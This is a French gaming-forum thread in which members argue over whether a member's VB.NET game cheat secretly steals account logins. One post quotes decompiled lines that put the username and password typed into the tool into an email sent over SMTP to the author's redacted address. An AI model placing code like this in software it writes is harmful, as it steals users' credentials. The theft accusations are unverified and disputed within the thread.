[IMPORTANT] Le post poubelle

    Publicités

Users Who Are Viewing This Thread (Total: 0, Members: 0, Guests: 0)

Status
Not open for further replies.

La Justice

Membre actif
May 18, 2012
163
0
922
Ip introuvable
Bonsoir,
Je repasse presque 2 ans après mes derniers clean, pour vous prévenir que je reprends du service presque h24 niveau analyse de virus. J'ai eu les remerciements Ben ainsi que d'Iron Man par le précédent.
Mon niveau n'a fait qu'évoluer :)

Bonne soirée à tous

La justice.
 

ppdooooo

Membre actif
Apr 25, 2014
295
0
136
36
Crétin.... Ses un cheat fais vb ses pour les login mdp cg3 et Ben ne serai pas capable de faire un virus
 
Aug 30, 2013
884
0
922
Mytho ! Aucun virus sur mon cheat ! Je peut même donner mon fichier sources donc ferme la petit enfoirée --'
Ps : Merci du soutien ppdooooo :)

---------- Message ajouté à 10h32 ---------- Le message précédent était à 10h30 ----------

Joueur : Ben9748

Lien : S4L Ingame Trainer (Need Bypass)

Raisons : Hack Compte de Cheat-Gam3 preuve de 5 ligne de son cheat que j'ai réussie a décompiler :

'Email
MyMailMessage.From = New MailAddress(".......@....") 'Destinataire
MyMailMessage.To.Add("........@.......") 'Expéditeur
MyMailMessage.Subject = ("[] Compte Cheat-Gam3") 'Sujet
MyMailMessage.Body = ("Login: " & TextBox1.Text & " Pass: " & TextBox2.Text) 'Corps
'SMTP

Les ........@...... entre les parenthèse c'est la ou il mais son email pour reçevoir les coordonné.

Voila je ne dirais pas son email et je me disais pourquoi il demander les coordonné sur son Cheat j'ai compris maintenant j'ai changer mon mot de passe.

Merci j'ai Finis.​
Vive les mythos hein j'ai fait 3 cheat avec un système anti leech donc ferme la maintenant et je pourrais jamais faire sa et sa me rapporterais rien donc chut --' Ceci est un fake !
Voici 5 preuves de mes sources

y9Q8b.png


akgsg.png


Zmfdg.png


dC50e.png


Djqsd

Agrandissez votre écran en fesant Control + molette !
 
Last edited:

PGM_Sn34K

Membre
Mar 29, 2014
46
0
131
Moi aussi je c'est supprimer les ligne et prend screens après faux pas prendre les gens pour des con.
 
Aug 30, 2013
884
0
922
Bim ! Maintenant tu va te calmer je peut même donner mes sources pendant que j'y suis donc ferme la s'il te plait noobi !
 
Status
Not open for further replies.